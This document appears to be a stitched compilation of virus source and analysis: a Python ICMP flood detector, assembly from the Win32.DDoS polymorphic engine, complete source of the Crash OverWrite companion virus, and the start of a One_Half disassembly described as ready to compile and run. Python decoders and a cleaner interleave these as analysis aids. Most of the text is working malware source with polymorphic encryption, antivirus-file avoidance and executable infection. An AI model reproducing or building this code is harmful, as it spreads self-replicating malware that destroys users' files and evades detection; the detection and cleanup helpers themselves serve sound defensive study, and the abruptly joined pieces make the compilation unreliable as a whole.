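    checksum field included, folds to 0xFFFF."""
    return len(pkt) >= 8 and ones_complement_sum(pkt) == 0xFFFF


def matches_ddos_ping(pkt: bytes) -> bool:
    """Signature of the message PingFlood sends: a 12-byte echo request
    (type 8, code 0) whose identifier, sequence and four payload bytes are
    all zero, with a correct checksum."""
    return (len(pkt) == 12 and pkt[0] == 8 and pkt[1] == 0
            and pkt[4:12] == bytes(8) and icmp_checksum_valid(pkt))


def flag_floods(records: Iterable[Tuple[str, str, bytes]],
                threshold: int) -> Dict[Tuple[str, str], int]:
    """Count signature hits per (src, dst) and return pairs at or above threshold."""
    hits = Counter((src, dst) for src, dst, pkt in records if matches_ddos_ping(pkt))
    return {pair: n for pair, n in hits.items() if n >= threshold}


# Constructed sample messages (not captured traffic).
# Type 8, code 0, checksum F7FF (the only non-zero word is 0800, so ~0800),
# then identifier, sequence and 4 payload bytes all zero: 12 bytes in total.
DDOS_PING = b"\x08\x00\xf7\xff" + bytes(8)
# An ordinary echo request: id 0100h, seq 1, 32-byte payload 'a'..; checksum
# EFE7 was computed by hand and is verified by icmp_checksum_valid below.
NORMAL_PING = b"\x08\x00\xef\xe7\x01\x00\x00\x01" + bytes(range(0x61, 0x81))
# DDOS_PING with one corrupted identifier byte: checksum no longer verifies.
CORRUPT_PING = DDOS_PING[:5] + b"\x01" + DDOS_PING[6:]

# Constructed log of (source, destination, ICMP message) observations.
SAMPLE_RECORDS = [("10.0.0.5", "192.0.2.1", DDOS_PING)] * 5 + [
    ("10.0.0.7", "192.0.2.1", NORMAL_PING),
    ("10.0.0.9", "192.0.2.1", CORRUPT_PING),
]

if __name__ == "__main__":
    print(flag_floods(SAMPLE_RECORDS, threshold=3))
```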

; ***************************************************************************
; -------------------------[ Align-Procedure ]-------------------------------
; ***************************************************************************
; lets align the size..
; eax - size
; ecx - base
Align:
push edx
xor edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx ; eax - new size
ret

; ***************************************************************************
; --------------------------[ FindFile Procedures ]--------------------------
; ***************************************************************************

FindFirstFileProc:
lea eax, [ebp+WIN32_FIND_DATA]
push eax
push esi
call dword ptr [ebp+XFindFirstFileA]
mov dword ptr [ebp+FindHandle], eax
ret

FindNextFileProc:
lea edi, [ebp+WFD_szFileName]
mov ecx, 276d ; we clear these fields !
xor eax, eax
rep stosb

lea eax, [ebp+WIN32_FIND_DATA]


push eax
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindNextFileA]
ret

CheckFileName:
pushad
lea esi, [ebp+WFD_szFileName]
mov edi, esi
mov ecx, 260d

ConvertLoop: ; Convert to upper cases


lodsb
cmp al, 96d
jb Convert
cmp al, 123d
ja Convert
or al, al
jz EndConvert
sub al, 32d
Convert:
stosb
loop ConvertLoop

EndConvert:
lea edi, [ebp+WFD_szFileName]
lea esi, [ebp+FileNames]
mov ecx, 3h
FileNameCheck: ; check for av-names
push ecx ; i don't want to infect them
mov ecx, 260d

CheckON:
lodsb
repnz scasb
or ecx, ecx
jnz AVFile

pop ecx
inc esi
loop FileNameCheck

jmp EndFileNameCheck

AVFile:
mov al, byte ptr [esi] ; check if the second char also matches
cmp byte ptr [edi], al
je GotAVFile

dec esi
jmp CheckON

GotAVFile:
pop ecx ; clear stack
popad
stc ; set carry flag
ret

EndFileNameCheck:
popad
clc
ret

FileNames db 'AV' ; we avoid these names


db 'AN' ; so we will not infect an AV and
db 'DR' ; alert the user

;****************************************************************************
; ---------------------[ Checks for PE / MZ Signs ]--------------------------
; ***************************************************************************
; we check here for PE and MZ signs
; to identify the Executable we want to infect
; I do this a little bit different than usual *g*
CheckPESign:
cmp dword ptr [edi], 'FP' ; check if greater or equal to PF
jae NoPESign

cmp dword ptr [edi], 'DP' ; check if lower or equal to PD


jbe NoPESign

clc ; all that's left is PE


ret

NoPESign:
stc ; set carry flag
ret

CheckMZSign:
cmp word ptr [esi], '[M'
jae NoPESign

cmp word ptr [esi], 'YM'


jbe NoPESign

clc
ret

; ***************************************************************************
; ----------------[ Generate a pseudo-random Number ]------------------------
; ***************************************************************************

GetRand:
; generate a pseudo-random NR.
; based on some initial registers
push ecx ; and the Windows - Ontime
add ecx, eax
call dword ptr [ebp+XGetTickCount]
add eax, ecx
add eax, ecx
add eax, edx
add eax, edi
add eax, ebp
add eax, dword ptr [ebp+PolyLen]
add eax, dword ptr [ebp+LoopLen]

sub eax, esi


sub eax, ebx

pop ecx
add eax, ecx

add al, byte ptr [ebp+Reg1]


add ah, byte ptr [ebp+Reg2]

or eax, eax
jne GetOutRand
mov eax, 87654321h
inc eax

GetOutRand:
xor edx, edx ; clean edx ( needed to be able to divide later )
div ecx ; Random Number is in EAX
; remainder ( 0 .. ECX-1 ) in EDX
ret

; ***************************************************************************
; ----------------------[ Generate a Poly Decryptor ]------------------------
; ***************************************************************************

genPoly:
and dword ptr [ebp+PolyLen], 0h

push 10h
pop ecx
call GetRand ; get a random number to start
; and save it as the new key used for all files

mov byte ptr [ebp+PolyKey], al


call GetRegs

lea edi, [ebp+PDecrypt] ; here starts the decryptor

call RandJunk
; we have 3 different ways to put
; the size in ecx and 3 different ways
; to get the starting offset in esi
push 2h ; divide by 2
pop ecx
call GetRand ; get a random number to decide what we do
; first
; we need these 2 values before we start the
; decryption loop !

; if edx = 1 we use the second one


dec edx ; chose the Order
jz SecondOrder
FirstOrder:
call GenerateESI ; esi comes first and ecx follows
call RandJunk
call GenerateECX ; and 3 different ways to get the size in ecx
jmp Polypreparefinished ; so there is nothing static here !

SecondOrder: ; ecx comes first and esi follows


call GenerateECX
call RandJunk
call GenerateESI

Polypreparefinished: ; we finished the preparing and can start the loop


; we need a
; xor byte ptr [esi], key ( or other crypto )
; inc esi / add esi, 1h
; loop Decryptor / dec ecx , jnz Above ..

; length of loop = 0
and dword ptr [ebp+LoopLen], 0
; now we choose the way we crypt this thing !

push 5h
pop ecx
call GetRand
mov dword ptr [ebp+CryptType], edx

XorDecrypt: ; we use a simple XOR BYTE PTR [ESI], KEY


dec edx
jnz NegDecrypt

mov ax, 3680h ; xor byte ptr [esi]


stosw

mov al, byte ptr [ebp+PolyKey]


stosb
; increase sizes ( we will add the last 2 bytes later )
add dword ptr [ebp+LoopLen], 1h
add dword ptr [ebp+PolyLen], 1h

jmp EndPolyCrypto

NegDecrypt: ; neg byte ptr [esi]


dec edx
jnz NotDecrypt
mov ax, 1EF6h
stosw
jmp EndPolyCrypto

NotDecrypt: ; not byte ptr [esi]


dec edx
jnz IncDecrypt
mov ax, 16F6h
stosw
jmp EndPolyCrypto

IncDecrypt: ; inc byte ptr [esi]


dec edx
jnz DecDecrypt
mov ax, 06FEh
stosw
jmp EndPolyCrypto

DecDecrypt: ; dec byte ptr [esi]


mov ax, 0EFEh
stosw

EndPolyCrypto: ; add the last 2 bytes


add dword ptr [ebp+LoopLen], 2h
add dword ptr [ebp+PolyLen], 2h

call RandJunk ; more junk.. ;)

; now we need to increase esi


; to crypt the next byte
push 3h
pop ecx
call GetRand

IncESI1:
dec edx
jnz IncESI2

mov al, 46h ; do a simple inc esi


stosb

jmp EndIncESI

IncESI2: ; add esi, 1h


dec edx
jnz IncESI3

mov al, 83h


stosb
mov ax, 01C6h
stosw

jmp EndIncESI2

IncESI3: ; clc, adc esi, 1h

mov eax, 01d683f8h


stosd

add dword ptr [ebp+LoopLen], 1h


add dword ptr [ebp+PolyLen], 1h

EndIncESI2:
add dword ptr [ebp+LoopLen], 2h
add dword ptr [ebp+PolyLen], 2h

EndIncESI:
add dword ptr [ebp+LoopLen], 1h
add dword ptr [ebp+PolyLen], 1h

call RandJunk ; more, and more..

; now esi is incremented and we just have to do


; the loop
push 3h
pop ecx
call GetRand
LoopType1: ; we use the most common form : loop ;)
dec edx
jnz LoopType2

mov al, 0e2h


stosb

call StoreLoopLen

jmp EndLoopType

LoopType2: ; we do a dec ecx, jnz


dec edx
jnz LoopType3

mov ax, 7549h


stosw ; correct Loop Size ( dec ecx = 1 byte )
add dword ptr [ebp+LoopLen], 1h
call StoreLoopLen

add dword ptr [ebp+PolyLen], 1h

jmp EndLoopType

LoopType3:
mov eax, 0F98349h ; dec ecx cmp ecx, 0h
stosd
add dword ptr [ebp+LoopLen], 4h
mov al, 75h ; jne
stosb
add dword ptr [ebp+PolyLen], 3h
call StoreLoopLen

EndLoopType:
add dword ptr [ebp+PolyLen], 2h

mov byte ptr [edi], 0C3h ; save the ending ret


add dword ptr [ebp+PolyLen], 2h

mov eax, VirusSize ; calculate the new size for the virus
add eax, dword ptr [ebp+PolyLen]
mov dword ptr [ebp+VirLen], eax

ret

StoreLoopLen:
xor eax, eax ; calculate the size for the loop
mov ax, 100h
sub eax, dword ptr [ebp+LoopLen]
sub eax, 2h
stosb
ret

; ***************************************************************************
; --------------------------[ Insert Junk Code ]----------------------------
; ***************************************************************************
RandJunk: ; edi points to the place where they will be stored
; we will insert 1-8 junk instructions
push 7d ; each time this routine is called
pop ecx
call GetRand
xchg ecx, edx
inc ecx

push ecx

RandJunkLoop:
push ecx

push 8h
pop ecx
call GetRand ; get a random number from 0 to 7
xchg eax, edx

lea ebx, [ebp+OpcodeTable]


xlat ; get the chosen opcode
stosb ; and save it to edi
xor eax, eax ; clean eax
; get first Register
mov al, byte ptr [ebp+Reg1]
shl eax, 3h ; multiply with 8
add eax, 0c0h ; add base
; add the second register
add al, byte ptr [ebp+Reg2]
stosb ; save opcode

XchangeRegs: ; we get new ones and exchange them


Call GetRegs ; cause the rnd - generator relies on them *g*
mov al, byte ptr [ebp+Reg1]
mov ah, byte ptr [ebp+Reg2]
mov byte ptr [ebp+Reg1], ah
mov byte ptr [ebp+Reg2], al

pop ecx ; restore ecx


loop RandJunkLoop ; and loop

pop ecx ; we need the additional length
shl ecx, 1 ; multiply with 2
; save it
add dword ptr [ebp+LoopLen], ecx
add dword ptr [ebp+PolyLen], ecx

ret

OpcodeTable:
db 08Bh ; mov
db 033h ; xor
db 00Bh ; or
db 02Bh ; sub
db 003h ; add
db 023h ; and
db 013h ; adc
db 01Bh ; sbb

GetRegs: ; select two registers to use


; set to Error
pushad
mov byte ptr [ebp+Reg1], -1
mov byte ptr [ebp+Reg2], -1

lea edi, [ebp+Reg1]


mov ecx, 2
; now we choose 2 registers we use

NextReg: ; to make the junk code look realistic


push ecx
push 8h
pop ecx
call GetRand
pop ecx

cmp edx, 1h ; we will not use ECX


je NextReg
cmp edx, 4h ; ESP
je NextReg
cmp edx, 6h ; or ESI, cause these values are important
je NextReg ; for the decryptor or the virus to work.
mov al, dl ; save it
stosb
loop NextReg

popad
ret

; ***************************************************************************
; -------------------------[ Get esi from stack ]----------------------------
; ***************************************************************************

GenerateESI:
; the first thing we do is to get the
; start of the crypted code, this is simple,
; it is our return address, so we get it from
; stack
; there are 3 different ways we can do this
push 3h
pop ecx
call GetRand
dec edx ; which way do we use ?

jnz ESI2

ESI1:
lea esi, [ebp+movESI] ; use the mov esi, [esp] instruction
movsw ; 3 bytes long
movsb
add dword ptr [ebp+PolyLen], 3h

jmp EndESI ; get back


ESI2: ; we simply pop esi and push it again
dec edx
jnz ESI3

mov al, 5eh ; pop esi


stosb
mov al, 56h
stosb ; push esi
add dword ptr [ebp+PolyLen],2h
jmp EndESI

ESI3:
push 5h
pop ecx
call GetRand
xchg eax, edx
cmp al, 1h ; if we got ecx, we use eax
jne ESI3b
xor eax, eax

ESI3b:
mov edx, eax
push edx ; save edx
add eax, 58h ; pop a register

stosb

pop eax ; push the value again


push eax
add eax, 50h
stosb

mov al, 08bh ; and finally move it to esi


stosb
pop eax
mov al, 0f0h
add al, dl
stosb
add dword ptr [ebp+PolyLen], 4h

EndESI:
ret

; code to retrieve the start of crypt-code


movESI db 8bh, 34h, 24h ; mov esi, [esp]

; ***************************************************************************
; --------------------------[ Move the size to ECX ]-------------------------
; ***************************************************************************

GenerateECX: ; here we put the size of the crypted


; part in ecx

push 3h
pop ecx
call GetRand ; random Nr in edx
inc edx ; increase

ECX1: ; use a simple mov


dec edx
jnz ECX2
mov al, 0b9h ; mov
call StoreALValue

jmp EndECX

ECX2: ; let's use a push ( value )


dec edx ; pop ecx
jnz ECX3

mov al, 068h ; push


call StoreALValue

mov al, 59h ; save the pop ecx


stosb
add dword ptr [ebp+PolyLen], 1h

jmp EndECX

ECX3:
push -1
pop ecx
call GetRand
mov eax, VirusSize
shl edx, 26d
shr edx, 26d
sub eax, edx

push eax ; mov ecx, Size - X


mov al, 0b9h
stosb ; and the size we need to decrypt
pop eax
stosb
call StoShrEAX

mov ax, 0c181h ; add ecx, X


stosw
xor eax, eax
mov al, dl

stosb
call StoShrEAX
add dword ptr [ebp+PolyLen], 11d

jmp EndECX ; finish

StoreECX: ; save the mov


push ax ; save the register

mov al, 0b8h ; save the mov reg, size


add al, dl
call StoreALValue

mov al, 03h ; add ecx, reg


stosb
pop ax ; get the chosen register
add al, 0c8h
stosb

add dword ptr [ebp+PolyLen], 4h

EndECX: ; let's return


ret

StoShrEAX: ; to save dwords backwards


push 3
pop ecx
StoShrEAXLoop:
shr eax, 8
stosb
loop StoShrEAXLoop
ret

StoreALValue: ; we store the instruction in al


stosb ; and the size we need to decrypt
mov eax, FirstLSize ; eax, size
stosb
call StoShrEAX

add dword ptr [ebp+PolyLen], 5h


add dword ptr [ebp+LoopLen], 5h
ret

; ***************************************************************************
; -------------------[ Data which does not travel ]--------------------------
; ***************************************************************************
VirusEnd: ; ok, this data will travel, but will be generated
; new on each run

PDecrypt: ; here will we add the polymorphic


; decryption routine later, but not included
; in the first generation
ret ; so we just return

db 150d dup (0h) ; we keep 150 bytes free, so we have a buffer


; for the poly decryptor

; here we save the data which does not


; travel which each copy of the virus

PolyKey db (?) ; key for the poly decryptor


PolyLen dd (?) ; length of decryptor
VirLen dd (?) ; virus length + decryptor
LoopLen dd (?) ; length of the decryption loop
CryptType dd (?) ; we save which kind of encryption we use

Reg1 db (?) ; here we save the registers we use for the junk
Reg2 db (?) ; code

SEH_Save dd (?) ; We save the original SEH

; Handles of the dll's we use


K32Handle dd (?) ; Kernel32.dll might be necessary *g*
IHLHandle dd (?) ; Imagehlp.dll to create checksums
ADVHandle dd (?) ; Advapi32.dll for registry access
W32Handle dd (?) ; Winsock DLL for pinging

; The Offsets of the API's we use


XLoadLibraryA dd (?) ; Here we save their Offset
XGetProcAddress dd (?)
XFindFirstFileA dd (?)
XFindNextFileA dd (?)
XFindClose dd (?)
XCreateFileA dd (?)
XSetFileAttributesA dd (?)
XCloseHandle dd (?)
XCreateFileMappingA dd (?)
XMapViewOfFile dd (?)
XUnmapViewOfFile dd (?)
XGetWindowsDirectoryA dd (?)
XGetSystemDirectoryA dd (?)
XGetCurrentDirectoryA dd (?)
XSetCurrentDirectoryA dd (?)
XGetFileAttributesA dd (?)
XGetTickCount dd (?)
XCreateThread dd (?)
XGetSystemTime dd (?)

XCheckSumMappedFile dd (?)

XRegOpenKeyExA dd (?)
XRegQueryValueExA dd (?)
XRegCloseKey dd (?)

Xsocket dd (?)
XWSACleanup dd (?)
XWSAStartup dd (?)
Xclosesocket dd (?)
Xsendto dd (?)
Xsetsockopt dd (?)

; Data to search Kernel


KernelAddy dd (?) ; Pointer to kernel PE-Header
MZAddy dd (?) ; Pointer to kernel MZ-Header

RegHandle dd (?) ; Handle to open Reg-Key

; Directories
windir db 7Fh dup (0) ; here we save the directories
curdir db 7Fh dup (0) ; we want to infect

; some data for infection


counter dw (?) ; a counter to know how many names we have compared
ATableVA dd (?) ; the Address Table VA
NTableVA dd (?) ; the Name Pointer Table VA
OTableVA dd (?) ; the Ordinal Table VA

NewSize dd (?) ; we save the new size of the file here


CheckSum dd (?) ; checksum
HeaderSum dd (?) ; crc of header

; Data to find files

WIN32_FIND_DATA label byte


WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)

FileHandle dd (?) ; handle of file


MapHandle dd (?) ; Handle of Map
MapAddress dd (?) ; offset of Map

Attributes dd (?) ; saved File-Attributes


threadID dd (?) ; payload runs in an extra thread
; we need this buffer for following
; the shortcuts
Buffer db 337d dup (?)
; this buffer is necessary
; to create a winsock connection ( ping )
WSA_DATA db 400d dup (0)

SystemTime: ; needed to get the current day


wYear dw (?)
wMonth dw (?)
wDayOfWeek dw (?) ; Sunday = 0, Monday = 1 .. etc.
wDay dw (?)
wHour dw (?)
wMinute dw (?)
wSecond dw (?)
wMilliseconds dw (?)

EndBufferData:
; ***************************************************************************
; ------------------------[ That's all folks ]-------------------------------
; ***************************************************************************
end Virus
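The GenerateESI and GenerateECX routines above each emit one of three byte forms for "get the start of the encrypted code from the stack" and "put the length in ECX". When analysing such a decryptor, the useful tool is the inverse: match the forms and read the hidden operand back out. The Python below is an added example written for this page; it is not part of Win32.DDoS or SnakeByte's code. It assumes the ESI form is immediately followed by the ECX form (the junk the engine can place between them is not modelled), accepts any register number for the pop/push/mov variant, and uses constructed sample prologues. Note that, as written in the listing, ECX1 and ECX2 embed FirstLSize while ECX3 builds its value from VirusSize, so the recovered number is simply whatever the generator wrote.

```python
"""Recognise the ESI/ECX-loading prologues that GenerateESI and GenerateECX
emit and recover the operand they hide.  Added example, not engine code."""
import struct

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def decode_esi(code, off=0):
    """Match one of the three GenerateESI variants at code[off:].
    Returns (description, source_register, length) or None."""
    if code[off:off + 3] == b"\x8b\x34\x24":        # ESI1: mov esi, [esp]
        return ("mov esi,[esp]", None, 3)
    if code[off:off + 2] == b"\x5e\x56":             # ESI2: pop esi / push esi
        return ("pop esi; push esi", "esi", 2)
    if len(code) - off >= 4:                         # ESI3: pop r / push r / mov esi, r
        r = code[off] - 0x58
        if 0 <= r <= 7 and code[off + 1] == 0x50 + r \
                and code[off + 2:off + 4] == bytes([0x8b, 0xf0 + r]):
            return ("pop r; push r; mov esi, r", REGS[r], 4)
    return None


def decode_ecx(code, off=0):
    """Match one of the three GenerateECX variants at code[off:].
    Returns (description, value_loaded_into_ecx, length) or None."""
    op = code[off:off + 1]
    if op == b"\xb9" and len(code) - off >= 5:       # mov ecx, imm32
        imm = struct.unpack_from("<I", code, off + 1)[0]
        # ECX3 follows the mov with 'add ecx, X' (81 C1 imm32) to repair the
        # value; X is at most 63 because the generator keeps only 6 random bits.
        if len(code) - off >= 11 and code[off + 5:off + 7] == b"\x81\xc1":
            x = struct.unpack_from("<I", code, off + 7)[0]
            return ("mov ecx, size-X; add ecx, X", (imm + x) & 0xffffffff, 11)
        return ("mov ecx, size", imm, 5)
    if op == b"\x68" and len(code) - off >= 6 and code[off + 5] == 0x59:
        imm = struct.unpack_from("<I", code, off + 1)[0]  # push imm32 / pop ecx
        return ("push size; pop ecx", imm, 6)
    return None


def recover_prologue(code):
    """Walk an ESI form followed by an ECX form; report what they set up."""
    esi = decode_esi(code, 0)
    if esi is None:
        return None
    ecx = decode_ecx(code, esi[2])
    if ecx is None:
        return None
    return {"esi_via": esi[0], "esi_reg": esi[1],
            "ecx_via": ecx[0], "size": ecx[1], "length": esi[2] + ecx[2]}


# Constructed prologues (not taken from a real sample), one per variant pair.
SAMPLES = [
    b"\x8b\x34\x24" + b"\xb9" + struct.pack("<I", 0x1000),
    b"\x5e\x56" + b"\x68" + struct.pack("<I", 0x1000) + b"\x59",
    b"\x5b\x53\x8b\xf3"                              # pop ebx / push ebx / mov esi, ebx
    + b"\xb9" + struct.pack("<I", 0x1234 - 0x2a)
    + b"\x81\xc1" + struct.pack("<I", 0x2a),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(recover_prologue(sample))
```

The point of the third form is visible in the numbers: a byte signature on `B9 <size>` fails because the immediate changes with every 6-bit X, yet `mov ecx, size-X ; add ecx, X` is a fixed two-instruction shape whose sum is constant, so matching on shape and folding the arithmetic recovers the size every time.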
; comment *
;
; Name: Crash OverWrite :-)
; Coder: BeLiAL
;
; This is my first Win32 virus. It's only a
; companion virus, but it does its work very
; well. It's perhaps coded a bit lame, but
; I'm sure nobody will care. It infects the
; first file in the directory and renames
; the victim file to .dat. Perhaps I'll
; make it resident or infect more files...
; Greetings and thanx go out
; to Evul,Toro,Padisah and Wallo.
;
; BeLiAL
;*

.386
.model flat
Locals
Jumps

Extrn FindFirstFileA :PROC


Extrn FindNextFileA :PROC
Extrn CreateFileA :PROC
Extrn WriteFile :PROC
Extrn ReadFile :PROC
Extrn GlobalAlloc :PROC
Extrn GlobalFree :PROC
Extrn ExitProcess :PROC
Extrn WinExec :PROC
Extrn CopyFileA :PROC
Extrn CloseHandle :PROC
Extrn SetFilePointer :PROC
Extrn GetFileSize :PROC

.data

MAX_PATH EQU 0ffh


FALSE EQU 0
changeoffset EQU 094fh
winsize EQU 05h

FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends

WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
memptr dd 0
counter1 dd 0
filehandle dd 0
filesize dd 00001000h
exefile db '*.exe',0
myname db 'crashoverwrite.exe',0
dd 0
dd 0
secbuffer dd 0
dd 0
dd 0
dd 0
db '[Crash OverWrite] coded by BeLiAL'

.code

start:
push offset FindFileData
push offset exefile
call FindFirstFileA
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h
je reanimate
mov eax,offset cFileName.FindFileData
find_dot1:
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1
push eax
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax
push FALSE
push offset secbuffer
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData
call CopyFileA
push FALSE
push offset cFileName.FindFileData
push offset myname
call CopyFileA
open_victim:
push 0
push 080h
push 3h
push 0h
push 0h
push 0c0000000h
push offset FindFileData.cFileName
Call CreateFileA
mov filehandle,eax
cmp eax,0ffffffffh
je reanimate
getmemory:
push filesize
push 0
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file
push edx
copyinmemory:
push 0
push offset counter1
push filesize
push edx
push filehandle
Call ReadFile
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset
mov eax,offset cFileName.FindFileData
modify_victim:
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0
push 0
push 0
push filehandle
call SetFilePointer
copy_to_file:
push 0
push offset counter1
push filesize
push memptr
push filehandle
call WriteFile
close_file:
push filehandle
call CloseHandle
reanimate:
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.'
je next_step3
cmp bx,'E.'
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h
that_was_all:
push winsize
push offset myname
call WinExec
final:
push 0
call ExitProcess

ends
end start
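The listing above shows the whole companion trick: the first `*.exe` found by FindFirstFileA is copied to a name with `dat` written over the three characters after its first `.`, the virus copies itself over the `.exe`, patches its own name at `changeoffset`, and the infected copy later launches the `.dat` through WinExec. The Python below is an added example for this page, not BeLiAL's code: it finds such droppers by the `[Crash OverWrite] coded by BeLiAL` string from the `.data` section (the virus itself recognises its own copies by `nFileSizeLow == 1000h`), reproduces the exact `.dat` naming, and moves the original program back. The sample directory it works on is constructed in a temporary folder.

```python
"""Find and undo Win32.CrashOverwrite's companion infection.
Added example for this page, not the virus author's code."""
import os
import shutil
import tempfile

MARKER = b"[Crash OverWrite] coded by BeLiAL"   # string in the virus's .data
VIRUS_SIZE = 0x1000                              # value compared at already_infected


def companion_name(name):
    """Mirror next_step1: write 'dat' over the 3 bytes after the first '.'."""
    dot = name.find(".")
    if dot < 0:
        return None
    return name[:dot + 1] + "dat" + name[dot + 4:]


def is_dropper(path):
    """True if the file carries the virus's data-section string."""
    try:
        with open(path, "rb") as fh:
            return MARKER in fh.read()
    except OSError:
        return False


def restore_directory(directory, dry_run=False):
    """Return (restored, orphaned).  restored: .exe names whose .dat companion
    was moved back into place; orphaned: infected .exe files with no companion
    left to restore (the original program is gone)."""
    restored, orphaned = [], []
    for name in sorted(os.listdir(directory)):
        if not name.lower().endswith(".exe"):
            continue
        exe = os.path.join(directory, name)
        if not is_dropper(exe):
            continue
        dat = os.path.join(directory, companion_name(name))
        if not os.path.isfile(dat):
            orphaned.append(name)
            continue
        if not dry_run:
            os.remove(exe)
            os.replace(dat, exe)
        restored.append(name)
    return restored, orphaned


def demo():
    """Build a constructed directory, clean it, and report what happened."""
    d = tempfile.mkdtemp()
    try:
        files = {
            "victim.exe": b"MZ" + MARKER + b"\0" * (VIRUS_SIZE - 2 - len(MARKER)),
            "victim.dat": b"MZ original program",
            "clean.exe":  b"MZ unrelated program",
            "lost.exe":   b"MZ" + MARKER,          # companion already deleted
        }
        for name, data in files.items():
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        restored, orphaned = restore_directory(d)
        with open(os.path.join(d, "victim.exe"), "rb") as fh:
            back = fh.read()
        dat_left = os.path.exists(os.path.join(d, "victim.dat"))
        return restored, orphaned, back, dat_left
    finally:
        shutil.rmtree(d, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

Two things the naming rule implies for clean-up: a victim with more than one dot (`my.app.exe`) gets its companion at `my.dat.exe`, not `my.app.dat`, so a cleaner that just swaps the extension misses it; and a dropper whose companion has been deleted cannot be repaired, only removed, which is why the function reports such files separately instead of touching them.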
; Virus One_Half
; Disassembly done by Ratter

; It's a polymorphic, reversible, multipartite virus from the Slovak coder known
; under the nick Vyvojar (== Developer). He is also the author of Level3.
; This is the disassembly I enjoyed the most. It's one of the best viruses
; in the dead world of DOS.
; It's functional. Just compile and run :)

; To Vyvojar: If ya're still living, could ya pls lemme know about it?
; I would be very happy if I could speak with you sometimes ...
; To otherz who are reading this: Pls lemme know if there's any bug in the code.
; Or just to say ya like this :)
; You can reach me on Undernet channel #virus, #3c or via email: ratter@atlas.cz

; Compile:
; tasm /t/m2 one_half.asm
; tlink /t one_half.obj

.486p

.487

seg_a segment byte public use16


assume cs:seg_a, ds:seg_a

org 100h

one_half proc far


start:
jmp loc_08d1 ; jmp to viruz_start
;jmp loc_0208 ; jmp to decode routine_start

db 101 dup (0)


loc_0168:
db 81h,0C0h,0FEh, 6Eh ; add ax, 6EFEh
jmp loc_056c
;
db 19 dup (0)
loc_0182:
cld
std
jnz short loc_01B1
jmp loc_08D1
;
db 40 dup (0)
;
loc_01B1:
xor [di], ax
jmp short loc_0168
;
db 64 dup (0)
;
loc_01f5:
db 2eh ; cs:
mov di, 582h
db 36h ; ss:
db 3eh ; ds:
jmp loc_049b
;
db 10 dup (0)
;
loc_0208:
push ax
nop
db 36h ; ss:
sti
db 36h ; ss:
clc
sti
jmp loc_0381
;
db 367 dup (0)
;
loc_0381:
push cs
cld
jmp loc_047c
;
db 246 dup (0)
;
loc_047C:
nop
sti
db 36h ; ss:
clc
nop
pop ds
db 36h ; ss:
jmp loc_01f5
;
db 21 dup (0)
;
loc_049b:
cld
db 3eh ; ds:
mov ax, 0bfbah
db 3eh ; ds:
std
jmp loc_01b1
;
db 148 dup (0)
;
loc_0539:
db 81h,0FFh, 5Ah, 13h ; cmp di, 135ah
sti
jmp loc_0182
;
db 43 dup (0)
;
loc_056c:
clc
sti
cmc
db 3eh ; ds:
nop
inc di
db 36h ; ss:
jmp loc_0539
pop ss
;
db 12 dup (0)
;

;
loc_0582:
;
p label near
p_ equ offset the_second_part - offset boot_start
p__ equ presun_rutiny + (p - buffer)
;
_mcb_ db 'Z' ; it'z last_block
dw 9F01h ; PSP
dw 0FFh ; 4096 bytez
db 3 dup(?) ; reserved
db 'COMMAND', 0 ; blockz_owner_name ...
;
exe_header dw 20CDh ; exe_signature
part_pag dw 501eh
page_cnt dw 09b4h
relo_cnt dw 0
hdr_size dw 21cdh
min_mem dw 1f58h
max_mem dw 0bac3h
relo_ss dw 03d0h
exe_sp dw 0efe8h
exe_flag db 00h ; checksum
db 0b4h
exe_ip dw 0100h
relo_cs dw 0FFF0h
tabl_off dw 0BA05h
;
decode_routine_table:
dw 0208h ; here'z the table
dw 0381h ; of offsetz, where are
dw 047ch ; the chunkz of code of
dw 01f5h ; decode_routine
dw 049bh
xor_offset dw 01b1h
dw 0168h
dw 056ch
dw 0539h
jnz_offset dw 0182h
;
beginning_ofs dw 07beh
;
overwritten_bytez:
db 06h, 83h, 05h, 00h, 00h, 2Eh
db 8Ch, 0Eh, 85h, 05h, 4Fh, 02h
